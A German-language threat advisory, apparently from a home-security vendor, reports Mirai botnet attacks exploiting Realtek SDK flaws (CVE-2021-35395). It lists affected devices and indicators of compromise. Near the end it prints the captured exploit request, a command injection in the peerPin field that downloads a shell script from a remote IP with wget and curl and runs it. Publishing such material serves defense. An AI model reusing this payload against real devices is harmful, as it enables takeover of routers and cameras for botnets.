MIRAI Malware wieder aktiv - Neue Botnetze sind im Aufbau!

Am 16. August, also vor neun Tagen, wurden mehrere Schwachstellen in einem Software-SDK, das als Teil von Realtek-Chipsätzen vertrieben wird, vom IoT Inspector Research Lab bekannt gegeben. Die Schwachstellen ermöglichen es Angreifern, die betroffenen Geräte vollständig zu kompromittieren und die Kontrolle darüber zu übernehmen. Eine Woche nach der Veröffentlichung, entdeckte die Heimsicherheitslösung Secure Home (Inspector Research) Versuche, diese Schwachstellen auszunutzen, um eine Variante der Mirai-Malware zu verbreiten.

Eine der aufgedeckten Schwachstellen, CVE-2021-35395, betrifft die Webschnittstelle, die Teil des SDK ist, und ist eine Sammlung von 6 verschiedenen Schwachstellen. Seit dem 18. August haben wir Versuche zur Ausnutzung von CVE-2021-35395 in freier Wildbahn identifiziert.

Wir haben insbesondere Exploit-Versuche auf den Webseiten „formWsc“ und „formSysCmd“ festgestellt. Mit dem Exploit wird versucht, eine Mirai-Variante einzusetzen, die im März von Palo Alto Networks entdeckt wurde. Mirai ist eine berüchtigte IoT- und Router-Malware, die in den letzten 5 Jahren in verschiedenen Formen im Umlauf war. Ursprünglich wurde sie eingesetzt, um große Teile des Internets lahmzulegen, hat sich aber inzwischen zu vielen Varianten für unterschiedliche Zwecke entwickelt [4].

Derselbe Angreifer - unterschiedliche Vorfälle:

Ein ähnlicher Vorfall wurde vor zwei Wochen, am 6. August, von Juniper Networks gemeldet [5]. Eine neu entdeckte Schwachstelle wurde dann nur zwei Tage nach der Veröffentlichung in freier Wildbahn ausgenutzt, um dieselbe Mirai-Variante zu verbreiten.

Der Webserver, der das Mirai-Botnetz bedient, verwendet dasselbe Netzwerk-Subnetz, was darauf hindeutet, dass derselbe Angreifer in beide Vorfälle verwickelt ist.
Diese Kette von Ereignissen zeigt, dass Hacker aktiv nach Schwachstellen für die Befehlsinjektion suchen und sie nutzen, um weit verbreitete Malware schnell zu verbreiten. Diese Art von Schwachstellen sind leicht auszunutzen und können schnell in bestehende Hacking-Frameworks integriert werden, die Angreifer einsetzen, lange bevor Geräte gepatcht werden und Sicherheitsanbieter reagieren können.

Die Sicherheitsforschungsgruppe von SAM verfolgt veröffentlichte Schwachstellen und blockiert sie schnell mit virtuellem IoT-Patching (lesen Sie unseren jüngsten Artikel, um mehr zu erfahren). Die oben genannten Schwachstellen wurden innerhalb eines Tages nach ihrer Veröffentlichung blockiert, so dass alle potenziell gefährdeten Geräte geschützt sind.

Betroffene Geräte:

Die betreffenden SoCs RTL8xxx (Modellnummern: EV-2009-02-06, EV-2010-09-20, EV-2006-07-27, EV-2009-02-06, EV-2010-09-20), RTL8196C (EV-2009-02-06), RTL8186 (EV-2006-07-27) und RTL8671 (EV-2006-07-27, EV-2010-09-20) kommen laut IoT Inspector etwa in VoIP- und Wireless-Routern, Repeatern, IP-Kameras und smarten Beleuchtungssteuerungen zum Einsatz. Konkret seien Produkte von mindestens 65 Herstellern, darunter beispielsweise AsusTEK, Belkin, D-Link, Edimax, Hama, Logitec und Netgear, betroffen.
Laut der ursprünglichen Untersuchung wird das anfällige Realtek SDK von mehr als 65 Anbietern auf über 200 Geräten verwendet. Laut SAMs eigener Untersuchung der angeschlossenen Geräte, die auf anonym gesammelten Netzwerkdaten von mehr als 2 Millionen Heim- und Unternehmensnetzwerken basiert, sind die folgenden Geräte die am häufigsten verwendeten Geräte mit dem Realtek SDK - siehe auch hier → https://www.iot-inspector.com/blog/advisory-multiple-issues-realtek-sdk-iot-supply-chain/

Netis E1+ Extender
Edimax N150 und N300 Wi-Fi-Router
Repotec RP-WR5444-Router
Diese Geräte werden hauptsächlich zur Verbesserung des Wi-Fi-Empfangs verwendet.

Vollständige Angriffsdetails:

Der Angriff ging von 31.210.20[.]100 aus. Wir gehen jedoch davon aus, dass sich die IP-Adressen der Angreifer im Laufe der Zeit ändern werden.

Die vollständige Angriffs-Nutzlast:

POST /goform/formWsc HTTP/1.1

Verbindung: close

Inhalt-Typ: anwendung/x-www-form-urlencoded

Benutzer-Agent: Dark

Payload:
submit-url=%2Fwlwps.asp&resetUnCfg=0&peerPin=12345678;cd /tmp; wget http://212.192.241.87/lolol.sh; curl -O http://212.192.241.87/lolol.sh; chmod 777 lolol.sh; sh lolol.sh;&setPIN=Start+PIN&configVxd=off&resetRptUnCfg=0&peerRptPin=

IOCs

IP addresses – 31.210.20[.]100, 212.192.241[.]87

Files

Filename Hash (sha256)
dark.x86 a3ee4bd2f330bf6939cb9121f36261e42f54ffc45676120216fd8da4cb52036a
dark.mips 9dfaa2e60027427c9f1ff377ad3cd3bc800b914c4b9ea5e408442d25f475dab9
dark.mpsl 24d6cd113c9ddf49cb6140d2cc185f2cc033170ac27e2c352d94848cc449c312
dark.arm4 caa8b10057fb699d463f309913d0557462e8b37afdaf4d0c3cff63f9b9605f0d
dark.arm5 fd7da924fe743d2e09b10f4e8a01230f7bc884ae14ef0e6133e553de118a457e
dark.arm6 0c734c8c0f8e575a08672d01fc5a729605b3e9dbb4d0c62bd94ad86d2c3d6aeb
dark.arm7 85b07054472bbaa06d0611dfb28632ffa351d3b13e37b447914f49a1dfe07dc4
dark.ppc a5478d51a809aed51d633611371c105e3ec82490f9516d186e7013dabcf8c77f
dark.m68k bf9d92666d3b25cf6e49234472a2fa515107eb6df07f4aee6deb6a42eed4fa92
dark.sh4 16787be5e8d7de5816d590efb4916c7415f458bc7059d2d287715fb3ef8e0783
dark.86_64 67a655d4360cfe0ca5db17c6486f3dfbca1c82c2af4bc1f2019cee68199108c7